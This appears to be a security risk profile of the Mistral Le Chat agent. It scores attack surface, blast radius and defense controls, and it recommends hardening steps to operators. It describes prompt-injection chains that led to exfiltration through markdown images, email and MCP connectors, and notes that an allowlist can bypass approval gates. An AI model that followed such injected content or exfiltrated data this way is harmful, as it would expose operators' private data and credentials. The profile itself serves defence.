1 Key Risks
The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Demonstrated prompt injection and data exfiltration research against the production service combines with absent output filtering and no documented monitoring to create an input-to-egress attack chain that operators cannot observe.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Mistral Le Chat shows a moderate composite driven by elevated input and output surfaces offset partially by sandboxed code execution and approval-gated MCP write operations.
The agent places in the Exposed Giants quadrant with attack surface above the midpoint, blast radius below the high-capability threshold, and defense controls covering less than a third of the available score range.
Each axis uses a different denominator: attack surface is measured out of ten, blast radius out of ten, defense controls out of fifteen, and the composite AIRQ score out of fifteen.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 4.54 | The moderate composite reflects partial defense coverage that narrows the gap between capability exposure and available safeguards, leaving meaningful hardening headroom for operators. |
| Blast Radius | 5.87 / 10 | OAuth-scoped MCP connector tokens for enterprise services and outbound network access through web search and connector write functions drive the capability factors. |
| Attack Surface | 5.64 / 10 | Demonstrated exploitation on user input, tool execution, and output processing surfaces drives the attack score above midpoint with all three exfiltration preconditions met. |
| Defense Controls | 4 / 15 | Input moderation and sandboxed execution provide partial coverage while output guardrails and monitoring have nothing documented on the default configuration. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The agent ingests content from web search, uploaded documents, and MCP connectors while rendering rich markdown output and executing tools across a bash sandbox and enterprise service connectors.
Higher scores indicate broader exposure to adversarial input and weaker boundary controls, with surfaces at adjusted ceiling carrying demonstrated exploitation evidence on the production service.
Each row names a distinct entry point into the agent's reasoning loop, its scored exposure level, and the evidence anchoring the assessment.
| Surface | Score | Comments |
|---|---|---|
| User Input | 4 / 4 | Web, mobile, API, and file upload channels accept input with content-safety moderation but no dedicated prompt injection shield; adversarial prompts achieved successful PII exfiltration on the production service. [3][5] |
| External Data | 3 / 4 | MCP connectors ingest data from enterprise platforms including email, code repositories, and project management tools; web search fetches content from untrusted URLs without documented content validation. [8] |
| Memory | 2 / 4 | Custom instructions persist across sessions as manual-only writes; the opt-in Memories feature adds automated cross-session saving but remains disabled on the default configuration. [9] |
| Reasoning | 2 / 4 | Multi-step reasoning operates within conversation scope with model selection but no documented chain-of-thought audit or reasoning transparency for the operator. [4][5] |
| Planning | 2 / 4 | Work mode decomposes tasks into tool calls with user-visible execution steps and no plan-level approval gate; planning scope stays within the active conversation. [5][6] |
| Tool Execution | 4 / 4 | Code Interpreter, bash sandbox, web search, and MCP write functions compose a multi-tool surface; research demonstrated tool misuse for data exfiltration on the production service. [3][6] |
| Orchestration | 2 / 4 | Multi-step task execution runs within user-supervised sessions with parallel tool calls; no background processes, scheduling, or headless daemon operation is documented. [5][6] |
| Inter-Agent | 2 / 4 | MCP connectors bridge the agent to external services including custom server URLs with no documented inter-agent message integrity verification or authentication protocol. [8] |
| Output Processing | 4 / 4 | Rich markdown with image rendering and MCP write functions carry no output DLP; research demonstrated exfiltration via markdown images and email-based output encoding on the production service. [1][3] |
| Configuration | 2 / 4 | Custom instructions and connector settings are managed through the settings UI with explicit user action; a vendor SDK supply chain incident and custom MCP server URLs highlight supply chain vetting gaps. [2][5] |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Le Chat ingests adversary-authored content through web search and MCP connectors, holds OAuth-scoped tokens for enterprise services, and renders rich markdown output that has been demonstrated as an exfiltration channel.
Mistral Le Chat exhibits all three of these conditions in its documented default configuration:
- Untrusted input — Content fetched via web search, user-uploaded files, and enterprise connector payloads from external platforms carry adversary-authored bytes into the reasoning context. [5][8]
- Sensitive data — OAuth-scoped MCP connectors access private enterprise data from code repositories, email inboxes, project boards, and payment platforms on behalf of the operator. [8]
- External egress — Markdown image rendering, web search outbound requests, and MCP connector write functions that send email and post to collaboration platforms provide default egress channels. [1][3]
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A successful compromise reaches sandboxed code execution, scoped file access, OAuth-scoped enterprise credentials, and outbound network connectivity through MCP connectors and web search.
Higher blast scores indicate broader reach from a compromised agent session, with network and credential factors elevated by the MCP connector framework's OAuth integration scope.
Each row ties a scored capability factor to the specific workflow node, OAuth scope, or sandbox boundary that determines how far a compromised session can reach.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 2 / 4 | Sandboxed Python Code Interpreter has no internet access; Work mode adds a scoped bash sandbox for multi-step agentic tool execution within the operator's session. [5][6] |
| File system access | 2 / 4 | File access is scoped to uploaded documents within the current conversation; no access to the operator's local file system or home directory is documented. [5] |
| Network access | 3 / 4 | MCP connectors make outbound calls to enterprise APIs; web search fetches content from the open web; Code Interpreter has no network access by design. [6][8] |
| Credential access | 3 / 4 | OAuth tokens for enterprise platforms including code repositories, email, project boards, and payment processors are held by the MCP connector framework with per-function authorization. [8] |
| Autonomous action | 2 / 4 | Work mode selects tools autonomously and gates write operations behind approval prompts; the progressive allowlist can permanently exempt individual functions from future approval. [6] |
| Deployment access | 2 / 4 | Vibe Code Workflow creates draft pull requests on connected code repositories but has no direct infrastructure deployment or package publishing capability documented. [5] |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Default controls provide ML-based input moderation and sandboxed code execution while leaving output filtering, exfiltration prevention, and operator-facing monitoring entirely undocumented.
Higher scores indicate stronger vendor-implemented safeguards on the default configuration, with the inverted coloring reflecting the gap between available protection and maximum coverage.
Each component is scored against what the vendor documents for the default configuration, with confidence reflecting the evidence tier for the control's existence.
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 1 / 3 | ML-based moderation classifier covers jailbreaking detection among nine policy categories, but no dedicated prompt injection shield or instruction hierarchy separation is documented on the default configuration. [7] |
| Execution Isolation | 2 / 3 | Code Interpreter runs in a vendor-documented sandboxed environment with no internet access; specific container technology and escape testing results are not publicly available. [5][10] |
| Action Controls | 1 / 3 | Approval gates require operator confirmation for MCP connector write operations, but the session-persistent progressive allowlist permanently exempts approved functions without automatic expiry or re-authentication, meeting the downgrade criteria. [6] |
| Output Guardrails | 0 / 3 | No output-specific DLP, exfiltration blocking, credential redaction, or URL sanitization is documented; research demonstrated data exfiltration through markdown rendering and email output. [1][3] |
| Monitoring | 0 / 3 | The vendor privacy policy references data retention for abuse monitoring but no operator-facing audit logging, SIEM forwarding, or anomaly detection is publicly documented. [10][11] |
6 Hardening Tips
Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize output-layer exfiltration controls, monitoring instrumentation, and tightening the progressive approval allowlist to close the demonstrated input-to-egress attack chain.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy Require all MCP connector inputs to pass through a secondary prompt injection classifier before reaching the model reasoning context.
- Configuration Configure the moderation API thresholds to maximum sensitivity for the jailbreaking category across all enterprise deployments.
- Engineering Deploy a dedicated prompt shield or instruction hierarchy separation layer between system prompts and user-provided or tool-retrieved content.
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy Restrict Work mode bash sandbox capabilities to a curated command allowlist and disable shell access for non-administrative user roles.
- Configuration Set per-session file upload limits and enforce automatic workspace purge after each Code Interpreter run to prevent data accumulation across tasks.
- Engineering Implement container escape detection and runtime security monitoring for all sandbox execution environments used by the agent.
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy Require periodic re-authentication for MCP connector write operations and disable the progressive allowlist feature that permanently bypasses approval.
- Configuration Configure per-connector scope restrictions to limit which MCP functions are available to each organizational role.
- Engineering Build a deny-by-default policy engine that requires explicit operator approval for each new MCP connector function category.
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy Require all agent output to pass through a DLP classifier that blocks credential patterns, PII, and encoded data before rendering.
- Configuration Disable markdown image rendering from external URLs and block Base64-encoded content in all agent output channels.
- Engineering Deploy an output sanitization layer that strips or rewrites URLs in markdown images and hyperlinks to prevent rendering-based exfiltration.
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy Mandate weekly review of agent conversation logs for prompt injection indicators, abnormal connector call volumes, and unauthorized data-access patterns, with SIEM forwarding and 90-day retention.
- Configuration Enable conversation-level monitoring dashboards that surface anomalous patterns such as repeated tool failures or unusual data access volumes.
- Engineering Implement behavioral anomaly detection that alerts on prompt injection signatures, exfiltration patterns, and privilege escalation attempts across agent sessions.
7 References
The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.
Selected Vulnerabilities
- Le Chat data exfiltration via email 0din.ai disclosure — indirect prompt injection via MCP email on production Le Chat (2026-03-05)
- Mistral SDK supply chain (GHSA-wx9m-wx4f-4cmg) CVSS 9.6 — malicious dropper in mistralai PyPI 2.4.6 via TanStack supply chain (2026-05)
Selected Research
- Imprompter — Tricking LLM Agents into Improper Tool Use PII exfiltration on production Mistral LeChat with 80% success rate (2024)
- ChatInject — Chat Template Abuse for Prompt Injection Class-level — 32-52% attack success rate on frontier LLMs including Mistral models (2025)
Vendor Documentation
- Le Chat product overview Vendor docs — Le Chat tools and modes
- Work mode documentation Multi-step agent harness with bash sandbox and approval gates
- Moderation and Guardrailing ML-based classifier with 9 policy categories including jailbreaking
- MCP Connectors documentation 20+ connectors plus custom MCP server support
- Memories documentation Opt-in cross-session persistent memory with graph-based architecture
Other Sources
- Mistral AI Trust Center Vendor trust and security resources hub
- Mistral AI Privacy Policy Data retention and training opt-out policies